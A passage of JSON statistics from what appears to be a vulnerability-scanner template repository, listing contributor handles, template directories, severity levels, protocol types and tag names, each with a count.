(@tech)","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"forgedhallpass","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"leovalcante","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"rootxharsh","count":6},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"_0xf4n9x_","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"imnightmaree","count":5},{"name":"yanyun","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"tanq16","count":4},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"defr0ggy","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"dolev farhi","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"lark-lab","count":3},{"name":"impramodsargar","count":3},{"name":"davidmckennirey","count":3},{"name":"h1ei1","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mr-xn","count":3},{"name":"fyoorer","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"dudez","count":3},{"name":"_generic_human_","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"skeltavik","count":3},{"name":"f1tz","count":3},{"name":"r3naissance","count":3},{"name":"jarijaas","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"0w4ys","count":3},{"name":"arcc","count":3},{"name":"mavericknerd","count":3},{"name":"github.com/its0x08","count":3},{"name":"thomas_from_offensity","count":3},{"name":"gitlab red team","count":3},{"name":"andydoering","count":3},{"name":"johnjhacking","count":3},{"name":"binaryfigments","count":3},{"name":"supras","count":3},{"name":"alifathi-h1","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"emenalf","count":3},{"name":"vsh00t","count":2},{"name":"zomsop82","count":2},{"name":"redteambrasil","count":2},{"name":"raesene","count":2},{"name":"bsysop","count":2},{"name":"kre80r","count":2},{"name":"bernardofsr","count":2},{"name":"0xsapra","count":2},{"name":"nuk3s3c","count":2},{"name":"0xrudra","count":2},{"name":"y4er","count":2},{"name":"convisoappsec","count":2},{"name":"paradessia","count":2},{"name":"danielmofer","count":2},{"name":"geekby","count":2},{"name":"z0ne","count":2},{"name":"luci","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"splint3r7","count":2},{"name":"gevakun","count":2},{"name":"k11h-de","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xelkomy","count":2},{"name":"dahse89","count":2},{"name":"kiblyn11","count":2},{"name":"r12w4n","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"vavkamil","count":2},{"name":"thardt-praetorian","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"ambassify","count":2},{"name":"hackerarpan","count":2},{"name":"0xcrypto","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"martincodes-de","count":2},{"name":"nvn1729","count":2},{"name":"x1m_martijn","count":2},{"name":"its0x08","count":2},{"name":"paperpen","count":2},{"name":"fabaff","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"0xprial","count":2},{"name":"gal nagli","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bananabr","count":2},{"name":"lotusdll","count":2},{"name":"sy3omda","count":2},{"name":"smaranchand","count":2},{"name":"huowuzhao","count":2},{"name":"hetroublemakr","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"g4l1t0","count":2},{"name":"rafaelwdornelas","count":2},{"name":"ajaysenr","count":2},{"name":"parth","count":2},{"name":"cckuakilong","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"socketz","count":2},{"name":"foulenzer","count":2},{"name":"w4cky_","count":2},{"name":"mohammedsaneem","count":2},{"name":"sbani","count":2},{"name":"ree4pwn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"taielab","count":2},{"name":"moritz nentwig","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"ofjaaah","count":1},{"name":"oscarintherocks","count":1},{"name":"husain","count":1},{"name":"yashanand155","count":1},{"name":"ahmed sherif","count":1},{"name":"bad5ect0r","count":1},{"name":"lethargynavigator","count":1},{"name":"droberson","count":1},{"name":"kabirsuda","count":1},{"name":"flag007","count":1},{"name":"sshell","count":1},{"name":"_harleo","count":1},{"name":"bartu utku sarp","count":1},{"name":"orpheus","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"xeldax","count":1},{"name":"ahmetpergamum","count":1},{"name":"affix","count":1},{"name":"exceed","count":1},{"name":"deena","count":1},{"name":"tea","count":1},{"name":"chron0x","count":1},{"name":"elder tao","count":1},{"name":"push4d","count":1},{"name":"tirtha_mandal","count":1},{"name":"c3l3si4n","count":1},{"name":"ooooooo_q","count":1},{"name":"akshansh","count":1},{"name":"akash.c","count":1},{"name":"notnotnotveg","count":1},{"name":"hexcat","count":1},{"name":"hakluke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"clarkvoss","count":1},{"name":"sherlocksecurity","count":1},{"name":"osamahamad","count":1},{"name":"soyelmago","count":1},{"name":"adrianmf","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"majidmc2","count":1},{"name":"ipanda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alex","count":1},{"name":"charanrayudu","count":1},{"name":"revblock","count":1},{"name":"v0idc0de","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"wabafet","count":1},{"name":"juicypotato1","count":1},{"name":"nielsing","count":1},{"name":"knassar702","count":1},{"name":"ahmed abou-ela","count":1},{"name":"jeya.seelan","count":1},{"name":"lark lab","count":1},{"name":"p-l-","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"yuansec","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"momen eldawakhly","count":1},{"name":"noamrathaus","count":1},{"name":"x6263","count":1},{"name":"tirtha","count":1},{"name":"makyotox","count":1},{"name":"remonsec","count":1},{"name":"noobexploiter","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"exploitation","count":1},{"name":"zinminphy0","count":1},{"name":"kurohost","count":1},{"name":"phyr3wall","count":1},{"name":"coldfish","count":1},{"name":"andirrahmani1","count":1},{"name":"arall","count":1},{"name":"0ut0fb4nd","count":1},{"name":"s1r1u5_","count":1},{"name":"thezakman","count":1},{"name":"manasmbellani","count":1},{"name":"andysvints","count":1},{"name":"rschio","count":1},{"name":"dawid-czarnecki","count":1},{"name":"izn0u","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"yavolo","count":1},{"name":"b0rn2r00t","count":1},{"name":"mesaglio","count":1},{"name":"ilovebinbash","count":1},{"name":"ok_bye_now","count":1},{"name":"whynotke","count":1},{"name":"xstp","count":1},{"name":"0xteles","count":1},{"name":"aresx","count":1},{"name":"skylark-lab","count":1},{"name":"d4vy","count":1},{"name":"patralos","count":1},{"name":"kiks7","count":1},{"name":"rojanrijal","count":1},{"name":"0xrod","count":1},{"name":"sicksec","count":1},{"name":"nerrorsec","count":1},{"name":"miroslavsotak","count":1},{"name":"schniggie","count":1},{"name":"elmahdi","count":1},{"name":"yashgoti","count":1},{"name":"kaizensecurity","count":1},{"name":"intx0x80","count":1},{"name":"thevillagehacker","count":1},{"name":"pratik khalane","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"jbaines-r7","count":1},{"name":"geraldino2","count":1},{"name":"alevsk","count":1},{"name":"co0nan","count":1},{"name":"becivells","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ldionmarcil","count":1},{"name":"f1she3","count":1},{"name":"regala_","count":1},{"name":"thebinitghimire","count":1},{"name":"shreyapohekar","count":1},{"name":"0xceba","count":1},{"name":"vzamanillo","count":1},{"name":"wlayzz","count":1},{"name":"ringo","count":1},{"name":"luskabol","count":1},{"name":"0xtavian","count":1},{"name":"aaronchen0","count":1},{"name":"myztique","count":1},{"name":"pudsec","count":1},{"name":"shelld3v","count":1},{"name":"duty_1g","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"compr00t","count":1},{"name":"berkdusunur","count":1},{"name":"jas37","count":1},{"name":"igibanez","count":1},{"name":"mhdsamx","count":1},{"name":"0h1in9e","count":1},{"name":"0xd0ff9","count":1},{"name":"notsoevilweasel","count":1},{"name":"d0rkerdevil","count":1},{"name":"kareemse1im","count":1},{"name":"0xceeb","count":1},{"name":"blckraven","count":1},{"name":"micha3lb3n","count":1},{"name":"dievus","count":1},{"name":"manuelbua","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"francescocarlucci","count":1},{"name":"kailashbohara","count":1},{"name":"act1on3","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"amnotacat","count":1},{"name":"fq_hsu","count":1},{"name":"brenocss","count":1},{"name":"3th1c_yuk1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"qlkwej","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"_darrenmartyn","count":1},{"name":"furkansayim","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"elouhi","count":1},{"name":"tim_koopmans","count":1},{"name":"apt-mirror","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"luqman","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"absshax","count":1},{"name":"j33n1k4","count":1},{"name":"borna nematzadeh","count":1},{"name":"zandros0","count":1},{"name":"opencirt","count":1},{"name":"brabbit10","count":1},{"name":"evan rubinstien","count":1},{"name":"2rs3c","count":1},{"name":"retr0","count":1},{"name":"thesubtlety","count":1},{"name":"jeya seelan","count":1},{"name":"daviey","count":1},{"name":"dhiyaneshdki","count":1},{"name":"hanlaomo","count":1},{"name":"b0yd","count":1},{"name":"rodnt","count":1},{"name":"xshuden","count":1},{"name":"iampritam","count":1},{"name":"retr02332","count":1},{"name":"petruknisme","count":1},{"name":"evolutionsec","count":1},{"name":"jteles","count":1},{"name":"rubina119","count":1},{"name":"udyz","count":1},{"name":"jiheon-dev","count":1},{"name":"harshinsecurity","count":1},{"name":"infosecsanyam","count":1},{"name":"luqmaan hadia","count":1},{"name":"alexrydzak","count":1},{"name":"anon-artist","count":1},{"name":"sickwell","count":1},{"name":"0xh7ml","count":1},{"name":"official_blackhat13","count":1},{"name":"rotemreiss","count":1},{"name":"alperenkesk","count":1},{"name":"prettyboyaaditya","count":1},{"name":"b4uh0lz","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"bjhulst","count":1},{"name":"narluin","count":1},{"name":"sec_hawk","count":1},{"name":"ggranjus","count":1},{"name":"pdp","count":1},{"name":"jrolf","count":1},{"name":"daffianfo","count":1},{"name":"mass0ma","count":1},{"name":"florianmaak","count":1},{"name":"exid","count":1},{"name":"breno_css","count":1},{"name":"willd96","count":1},{"name":"toufik-airane","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"_c0wb0y_","count":1},{"name":"un-fmunozs","count":1},{"name":"undefl0w","count":1},{"name":"arr0way","count":1},{"name":"furkansenan","count":1},{"name":"zsusac","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"shifacyclewla","count":1},{"name":"veshraj","count":1},{"name":"omarkurt","count":1},{"name":"gboddin","count":1}],"directory":[{"name":"cves","count":1150},{"name":"exposed-panels","count":519},{"name":"vulnerabilities","count":446},{"name":"technologies","count":251},{"name":"exposures","count":203},{"name":"misconfiguration","count":196},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":94},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1183},{"name":"high","count":868},{"name":"medium","count":656},{"name":"critical","count":410},{"name":"low","count":180},{"name":"unknown","count":6}],"types":[{"name":"http","count":3159},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1150},{"name":"panel","count":513},{"name":"lfi","count":460},{"name":"xss","count":363},{"name":"wordpress","count":358},{"name":"exposure","count":292},{"name":"rce","count":289},{"name":"cve2021","count":283},{"name":"tech","count":265},{"name":"wp-plugin","count":259},{"name":"cve2020","count":196},{"name":"","count":188},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"apache","count":120},{"name":"cve2018","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":109},{"name":"unauth","count":103},{"name":"iot","count":102},{"name":"oast","count":96},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":68},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"sqli","count":62},{"name":"ssrf","count":60},{"name":"file","count":60},{"name":"cve2022","count":59},{"name":"network","count":53},{"name":"oracle","count":50},{"name":"router","count":49},{"name":"wp","count":49},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"auth-bypass","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"authenticated","count":35},{"name":"cisco","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":25},{"name":"kubernetes","count":25},{"name":"oss","count":24},{"name":"adobe","count":24},{"name":"springboot","count":24},{"name":"cms","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"misc","count":21},{"name":"microsoft","count":21},{"name":"intrusive","count":21},{"name":"aem","count":21},{"name":"vmware","count":21},{"name":"debug","count":21},{"name":"service","count":20},{"name":"fuzz","count":20},{"name":"cve2012","count":19},{"name":"wp-theme","count":19},{"name":"manageengine","count":19},{"name":"zoho","count":18},{"name":"php","count":18},{"name":"dns","count":18},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"deserialization","count":17},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"dlink","count":15},{"name":"struts","count":15},{"name":"hp","count":14},{"name":"xxe","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"api","count":14},{"name":"fileupload","count":14},{"name":"cve2009","count":14},{"name":"ruijie","count":13},{"name":"camera","count":13},{"name":"lfr","count":12},{"name":"status","count":12},{"name":"netsweeper","count":12},{"name":"cve2013","count":12},{"name":"printer","count":12},{"name":"log4j","count":12},{"name":"rails","count":12},{"name":"magento","count":11},{"name":"cnvd2021","count":11},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"nginx","count":11},{"name":"firewall","count":11},{"name":"upload","count":11},{"name":"coldfusion","count":10},{"name":"fortigate","count":10},{"name":"spring","count":10},{"name":"grafana","count":10},{"name":"jolokia","count":10},{"name":"airflow","count":10},{"name":"auth","count":10},{"name":"backup","count":10},{"name":"glpi","count":10},{"name":"dell","count":10},{"name":"fastjson","count":9},{"name":"windows","count":9},{"name":"woocommerce","count":9},{"name":"drupal","count":9},{"name":"ftp","count":9},{"name":"mirai","count":9},{"name":"laravel","count":9},{"name":"webserver","count":9},{"name":"github","count":9},{"name":"jndi","count":9},{"name":"fortinet","count":9},{"name":"cve2008","count":9},{"name":"zabbix","count":9},{"name":"django","count":8},{"name":"blind","count":8},{"name":"wso2","count":8},{"name":"audit","count":8},{"name":"vcenter","count":8},{"name":"citrix","count":8},{"name":"amazon","count":8},{"name":"phpmyadmin","count":8},{"name":"prometheus","count":8},{"name":"bypass","count":8},{"name":"solr","count":8},{"name":"iis","count":8},{"name":"confluence","count":8},{"name":"azure","count":8},{"name":"metadata","count":8},{"name":"scada","count":8},{"name":"mail","count":7},{"name":"kafka","count":7},{"name":"sonicwall","count":7},{"name":"ssti","count":7},{"name":"firebase","count":7},{"name":"bucket","count":7},{"name":"maps","count":7},{"name":"files","count":7},{"name":"exchange","count":7},{"name":"rconfig","count":7},{"name":"elasticsearch","count":7},{"name":"squirrelmail","count":7},{"name":"kube","count":7},{"name":"python","count":7},{"name":"vpn","count":7},{"name":"firmware","count":6},{"name":"huawei","count":6},{"name":"bigip","count":6},{"name":"jetty","count":6},{"name":"docker","count":6},{"name":"jboss","count":6},{"name":"headless","count":6},{"name":"crlf","count":6},{"name":"magmi","count":6},{"name":"cicd","count":6},{"name":"slack","count":6},{"name":"lucee","count":6},{"name":"druid","count":6},{"name":"enum","count":6},{"name":"backdoor","count":6},{"name":"sitecore","count":6},{"name":"nodejs","count":6},{"name":"ofbiz","count":6},{"name":"cobbler","count":6},{"name":"fpd","count":6},{"name":"cnvd2020","count":6},{"name":"zimbra","count":6},{"name":"go","count":6},{"name":"error","count":5},{"name":"samsung","count":5},{"name":"alibaba","count":5},{"name":"ssl","count":5},{"name":"symfony","count":5},{"name":"setup","count":5},{"name":"apisix","count":5},{"name":"cache","count":5},{"name":"metinfo","count":5},{"name":"strapi","count":5},{"name":"keycloak","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"leak","count":5},{"name":"rfi","count":5},{"name":"icewarp","count":5},{"name":"fatpipe","count":5},{"name":"opensis","count":5},{"name":"kubelet","count":5},{"name":"ecology","count":5},{"name":"symantec","count":5},{"name":"node","count":5},{"name":"rseenet","count":5},{"name":"microweber","count":5},{"name":"ruby","count":5},{"name":"thinkphp","count":5},{"name":"minio","count":5},{"name":"gocd","count":5},{"name":"solarwinds","count":5},{"name":"zhiyuan","count":5},{"name":"moodle","count":5},{"name":"git","count":5},{"name":"artica","count":5},{"name":"storage","count":5},{"name":"websphere","count":4},{"name":"oa","count":4},{"name":"puppet","count":4},{"name":"microstrategy","count":4},{"name":"prestashop","count":4},{"name":"nexus","count":4},{"name":"activemq","count":4},{"name":"gogs","count":4},{"name":"paypal","count":4},{"name":"stripe","count":4},{"name":"hpe","count":4},{"name":"hikvision","count":4},{"name":"sonarqube","count":4},{"name":"kevinlab","count":4},{"name":"flink","count":4},{"name":"hongdian","count":4},{"name":"cloud","count":4},{"name":"kibana","count":4},{"name":"xmlrpc","count":4},{"name":"beyondtrust","count":4},{"name":"terramaster","count":4},{"name":"ognl","count":4},{"name":"wcs","count":4},{"name":"voip","count":4},{"name":"photo","count":4},{"name":"thinkcmf","count":4},{"name":"cve2007","count":4},{"name":"smtp","count":4},{"name":"caucho","count":4},{"name":"mailchimp","count":4},{"name":"hoteldruid","count":4},{"name":"artifactory","count":4},{"name":"zyxel","count":4},{"name":"mongodb","count":4},{"name":"plesk","count":4},{"name":"db","count":4},{"name":"jellyfin","count":4},{"name":"cacti","count":4},{"name":"tikiwiki","count":4},{"name":"elastic","count":4},{"name":"springcloud","count":4},{"name":"awstats","count":4},{"name":"cnvd2019","count":4},{"name":"resin","count":4},{"name":"npm","count":4},{"name":"couchdb","count":4},{"name":"jetbrains","count":4},{"name":"cockpit","count":4},{"name":"ssh","count":4},{"name":"search","count":4},{"name":"panos","count":4},{"name":"buffalo","count":4},{"name":"adminer","count":4},{"name":"asp","count":4},{"name":"aspose","count":4},{"name":"postmessage","count":3},{"name":"axis2","count":3},{"name":"trendnet","count":3},{"name":"fortios","count":3},{"name":"circleci","count":3},{"name":"nosqli","count":3},{"name":"log","count":3},{"name":"rlm","count":3},{"name":"dolibarr","count":3},{"name":"sendgrid","count":3},{"name":"nuuo","count":3},{"name":"panabit","count":3},{"name":"seeyon","count":3},{"name":"mcafee","count":3},{"name":"sophos","count":3},{"name":"openbmcs","count":3},{"name":"elfinder","count":3},{"name":"phppgadmin","count":3},{"name":"workspaceone","count":3},{"name":"bitrix","count":3},{"name":"glassfish","count":3},{"name":"database","count":3},{"name":"bruteforce","count":3},{"name":"epson","count":3},{"name":"subrion","count":3},{"name":"smb","count":3},{"name":"linkerd","count":3},{"name":"javascript","count":3},{"name":"concrete","count":3},{"name":"axigen","count":3},{"name":"httpbin","count":3},{"name":"dos","count":3},{"name":"mongo","count":3},{"name":"synology","count":3},{"name":"linkedin","count":3},{"name":"jfrog","count":3},{"name":"telerik","count":3},{"name":"3cx","count":3},{"name":"trixbox","count":3},{"name":"heroku","count":3},{"name":"odoo","count":3},{"name":"centos","count":3},{"name":"selea","count":3},{"name":"axis","count":3},{"name":"empirecms","count":3},{"name":"ebs","count":3},{"name":"geowebserver","count":3},{"name":"samba","count":3},{"name":"cisa","count":3},{"name":"lansweeper","count":3},{"name":"netlify","count":3},{"name":"seagate","count":3},{"name":"lotus","count":3},{"name":"sharepoint","count":3},{"name":"consul","count":3},{"name":"vrealize","count":3},{"name":"wordfence","count":3},{"name":"targa","count":3},{"name":"linksys","count":3},{"name":"openemr","count":3},{"name":"voipmonitor","count":3},{"name":"facebook","count":3},{"name":"prtg","count":3},{"name":"sql","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"dreambox","count":3},{"name":"exposures","count":3},{"name":"hashicorp","count":3},{"name":"jamf","count":3},{"name":"httpd","count":3},{"name":"globalprotect","count":3},{"name":"sugarcrm","count":3},{"name":"splunk","count":3},{"name":"ems","count":3},{"name":"pentaho","count":3},{"name":"ampps","count":3},{"name":"oauth","count":3},{"name":"graph","count":3},{"name":"movable","count":3},{"name":"square","count":3},{"name":"actuator","count":3},{"name":"thinfinity","count":3},{"name":"zeroshell","count":3},{"name":"webadmin","count":3},{"name":"fanruan","count":3},{"name":"jeesns","count":3},{"name":"fuelcms","count":3},{"name":"grav","count":3},{"name":"messaging","count":3},{"name":"kentico","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"redis","count":3},{"name":"openssh","count":3},{"name":"horizon","count":3},{"name":"kingsoft","count":3},{"name":"phpinfo","count":3},{"name":"exacqvision","count":2},{"name":"tapestry","count":2},{"name":"key","count":2},{"name":"gitbook","count":2},{"name":"rancher","count":2},{"name":"konga","count":2},{"name":"pascom","count":2},{"name":"cve2006","count":2},{"name":"nextcloud","count":2},{"name":"node-red-dashboard","count":2},{"name":"jmx","count":2},{"name":"cloudinary","count":2},{"name":"ericsson","count":2},{"name":"livezilla","count":2},{"name":"bigant","count":2},{"name":"harbor","count":2},{"name":"showdoc","count":2},{"name":"webmin","count":2},{"name":"zte","count":2},{"name":"projectsend","count":2},{"name":"netscaler","count":2},{"name":"places","count":2},{"name":"zzzcms","count":2},{"name":"kong","count":2},{"name":"jeedom","count":2},{"name":"dvwa","count":2},{"name":"cloudflare","count":2},{"name":"ametys","count":2},{"name":"mantisbt","count":2},{"name":"seowon","count":2},{"name":"netdata","count":2},{"name":"intellian","count":2},{"name":"embed","count":2},{"name":"casdoor","count":2},{"name":"accela","count":2},{"name":"typo3","count":2},{"name":"gitea","count":2},{"name":"versa","count":2},{"name":"tileserver","count":2},{"name":"bigbluebutton","count":2},{"name":"code42","count":2},{"name":"tidb","count":2},{"name":"azkaban","count":2},{"name":"frontpage","count":2},{"name":"gespage","count":2},{"name":"ucmdb","count":2},{"name":"lantronix","count":2},{"name":"natshell","count":2},{"name":"netis","count":2},{"name":"sequoiadb","count":2},{"name":"emqx","count":2},{"name":"hasura","count":2},{"name":"ranger","count":2},{"name":"auerswald","count":2},{"name":"couchbase","count":2},{"name":"supermicro","count":2},{"name":"conductor","count":2},{"name":"detect","count":2},{"name":"craftcms","count":2},{"name":"alienvault","count":2},{"name":"glances","count":2},{"name":"rocketchat","count":2},{"name":"myfactory","count":2},{"name":"totemomail","count":2},{"name":"digitalrebar","count":2},{"name":"tableau","count":2},{"name":"guacamole","count":2},{"name":"pcoip","count":2},{"name":"commax","count":2},{"name":"seacms","count":2},{"name":"mailgun","count":2},{"name":"csrf","count":2},{"name":"watchguard","count":2},{"name":"pam","count":2},{"name":"ebook","count":2},{"name":"backups","count":2},{"name":"jitsi","count":2},{"name":"avantfax","count":2},{"name":"dynamicweb","count":2},{"name":"apereo","count":2},{"name":"openwrt","count":2},{"name":"rackstation","count":2},{"name":"cyberoam","count":2},{"name":"mbean","count":2},{"name":"sysaid","count":2},{"name":"akkadian","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"pgadmin","count":2},{"name":"ixcache","count":2},{"name":"mysql","count":2},{"name":"rstudio","count":2},{"name":"qihang","count":2},{"name":"ansible","count":2},{"name":"javamelody","count":2},{"name":"frp","count":2},{"name":"chyrp","count":2},{"name":"fortimail","count":2},{"name":"owasp","count":2},{"name":"s3","count":2},{"name":"erxes","count":2},{"name":"shellshock","count":2},{"name":"liferay","count":2},{"name":"ec2","count":2},{"name":"viewpoint","count":2},{"name":"rackn","count":2},{"name":"kiwitcms","count":2},{"name":"pbootcms","count":2},{"name":"qcubed","count":2},{"name":"clusterengine","count":2},{"name":"lighttpd","count":2},{"name":"electron","count":2},{"name":"pega","count":2},{"name":"aruba","count":2},{"name":"digitalocean","count":2},{"name":"emerge","count":2},{"name":"globaldomains","count":2},{"name":"dotnetnuke","count":2},{"name":"bitly","count":2},{"name":"circontrol","count":2},{"name":"chiyu","count":2},{"name":"cve2005","count":2},{"name":"otobo","count":2},{"name":"redash","count":2},{"name":"gradle","count":2},{"name":"avaya","count":2},{"name":"zerof","count":2},{"name":"motorola","count":2},{"name":"openstack","count":2},{"name":"influxdb","count":2},{"name":"tenda","count":2},{"name":"ruckus","count":2},{"name":"mobileiron","count":2},{"name":"alfresco","count":2},{"name":"umbraco","count":2},{"name":"appcms","count":2},{"name":"nextjs","count":2},{"name":"hubspot","count":2},{"name":"fortiweb","count":2},{"name":"yapi","count":2},{"name":"plastic","count":2},{"name":"graphite","count":2},{"name":"phpshowtime","count":2},{"name":"ivanti","count":2},{"name":"octoprint","count":2},{"name":"jsf","count":2},{"name":"neos","count":2},{"name":"cas","count":2},{"name":"shenyu","count":2},{"name":"proftpd","count":2},{"name":"intercom","count":2},{"name":"airtame","count":2},{"name":"vidyo","count":2},{"name":"syslog","count":2},{"name":"apollo","count":2},{"name":"rosariosis","count":2},{"name":"cgi","count":2},{"name":"homematic","count":2},{"name":"resourcespace","count":2},{"name":"getsimple","count":2},{"name":"akamai","count":2},{"name":"sdwan","count":2},{"name":"impresscms","count":2},{"name":"filemanager","count":2},{"name":"domxss","count":2},{"name":"terraform","count":2},{"name":"cocoon","count":2},{"name":"hjtcloud","count":2},{"name":"kafdrop","count":2},{"name":"yii","count":2},{"name":"dotcms","count":2},{"name":"mida","count":2},{"name":"twitter","count":2},{"name":"sqlite","count":2},{"name":"pacsone","count":2},{"name":"ambari","count":2},{"name":"hadoop","count":2},{"name":"forcepoint","count":2},{"name":"itop","count":2},{"name":"ecoa","count":2},{"name":"traefik","count":2},{"name":"xweb500","count":2},{"name":"metabase","count":2},{"name":"ovirt","count":2},{"name":"listserv","count":2},{"name":"sentry","count":2},{"name":"gophish","count":2},{"name":"matrix","count":2},{"name":"igs","count":2},{"name":"wamp","count":2},{"name":"avtech","count":2},{"name":"wooyun","count":2},{"name":"idrac","count":2},{"name":"payara","count":2},{"name":"thruk","count":2},{"name":"netsus","count":2},{"name":"phpcollab","count":2},{"name":"orchid","count":2},{"name":"hostheader-injection","count":2},{"name":"password","count":2},{"name":"labkey","count":2},{"name":"servicenow","count":2},{"name":"saltstack","count":2},{"name":"nagios","count":2},{"name":"openfire","count":2},{"name":"bmc","count":2},{"name":"pfsense","count":2},{"name":"hiveos","count":2},{"name":"flightpath","count":2},{"name":"middleware","count":2},{"name":"ilo","count":2},{"name":"sidekiq","count":2},{"name":"openvpn","count":2},{"name":"justwriting","count":2},{"name":"netflix","count":2},{"name":"text","count":2},{"name":"acrolinx","count":2},{"name":"iptime","count":2},{"name":"seeddms","count":2},{"name":"weather","count":2},{"name":"swagger","count":2},{"name":"gitlist","count":2},{"name":"rockmongo","count":2},{"name":"xxljob","count":2},{"name":"idea","count":2},{"name":"wuzhicms","count":2},{"name":"horde","count":2},{"name":"skycaiji","count":2},{"name":"smartstore","count":2},{"name":"ghost","count":2},{"name":"phpstorm","count":2},{"name":"bomgar","count":2},{"name":"pulse","count":2},{"name":"favicon","count":2},{"name":"checkpoint","count":2},{"name":"rabbitmq","count":2},{"name":"jquery","count":2},{"name":"xerox","count":2},{"name":"virtualui","count":2},{"name":"tongda","count":2},{"name":"nasos","count":2},{"name":"codeigniter","count":2},{"name":"dubbo","count":2},{"name":"flir","count":2},{"name":"sangfor","count":2},{"name":"ad","count":2},{"name":"metersphere","count":2},{"name":"linux","count":2},{"name":"spark","count":2},{"name":"aviatrix","count":2},{"name":"arcgis","count":2},{"name":"docs","count":2},{"name":"chamilo","count":2},{"name":"zblogphp","count":2},{"name":"argussurveillance","count":1},{"name":"acexy","count":1},{"name":"launchdarkly","count":1},{"name":"tensorboard","count":1},{"name":"webpconverter","count":1},{"name":"eventtickets","count":1},{"name":"karma","count":1},{"name":"nsasg","count":1},{"name":"elementor","count":1},{"name":"axxonsoft","count":1},{"name":"graphiql","count":1},{"name":"jumpcloud","coun